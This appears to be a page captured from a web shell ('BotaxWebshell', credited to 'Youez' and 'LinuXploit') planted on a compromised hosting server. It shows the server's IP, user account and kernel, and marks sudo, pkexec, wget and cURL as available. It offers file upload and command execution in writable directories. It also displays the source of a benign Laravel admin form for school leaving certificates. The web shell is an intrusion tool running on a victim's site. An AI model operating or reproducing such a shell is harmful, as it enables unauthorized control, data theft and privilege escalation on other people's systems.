BotaxWebshell
Server IP : 68.178.172.28  /  Your IP : 216.73.216.26
Web Server : Apache
System : Linux 28.172.178.68.host.secureserver.net 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
User : kiskarnal ( 1003)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /home/kiskarnal/public_html/resources/views/admin/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/kiskarnal/public_html/resources/views/admin/add_slc.blade.php
@include('admin.includes.header');
<body>
    
    <main id="main" class="main">

    <div class="pagetitle">
        <h1>Add SLC</h1>
        <nav>
            <ol class="breadcrumb">
                <li class="breadcrumb-item"><a href="{{url('/')}}">Dashboard</a></li>
                <li class="breadcrumb-item active">Add School Leaving Certificate Form</li>
            </ol>
        </nav>
    </div><!-- End Page Title -->

     <section class="section">

          <div class="card">
            <div class="card-body">
              <!-- General Form Elements -->
            <form action="{{url('admin/save-slc')}}" method="post" enctype="multipart/form-data">
                @csrf
                 <input type="hidden" name="edit_id" value="{{isset($slc) ? $slc->id : ''}}">
                 
                <div class="row mt-5 mb-2">
                    <label for="inputText" class="col-sm-2 col-form-label">Admission Number</label>
                    <div class="col-sm-10">
                        <input type="number" name="admission_number" class="form-control" value="{{isset($slc) ? $slc->admission_number : ''}}" placeholder="e.g 12345" value="">
                    </div>
                </div>
                 
                <div class="row mb-4">
                    <label for="inputText" class="col-sm-2 col-form-label">Student Name</label>
                    <div class="col-sm-10">
                        <input type="text" name="student_name" class="form-control" value="{{isset($slc) ? $slc->student_name : ''}}">
                    </div>
                </div>
                
                <div class="row mb-4">
                    <label for="inputText" class="col-sm-2 col-form-label">Father Name</label>
                    <div class="col-sm-10">
                        <input type="text" name="father_name" class="form-control" value="{{isset($slc) ? $slc->father_name : ''}}">
                    </div>
                </div>
                
                <div class="row mb-4">
                    <label for="inputNumber" class="col-sm-2 col-form-label">Upload Image</label>
                    <div class="col-sm-10">
                        <input class="form-control" name="image" type="file" id="slcimage" title="">
                    </div>
                    @if(isset($slc))
                    <img src="{{asset('images/'.$slc->image)}}" style="height:100px;width:100px;">
                    @endif
                </div>
                
                <div class="row mb-3">
                    <div class="col-sm-12 text-end">
                        <button type="submit" class="btn btn-primary">Save & Add</button>
                     </div>
                </div>

              </form><!-- End General Form Elements -->

            </div>
          </div>

    </section>
  </main><!-- End #main -->
    
</body>

@include('admin.includes.footer');


Youez - 2016 - github.com/yon3zu
LinuXploit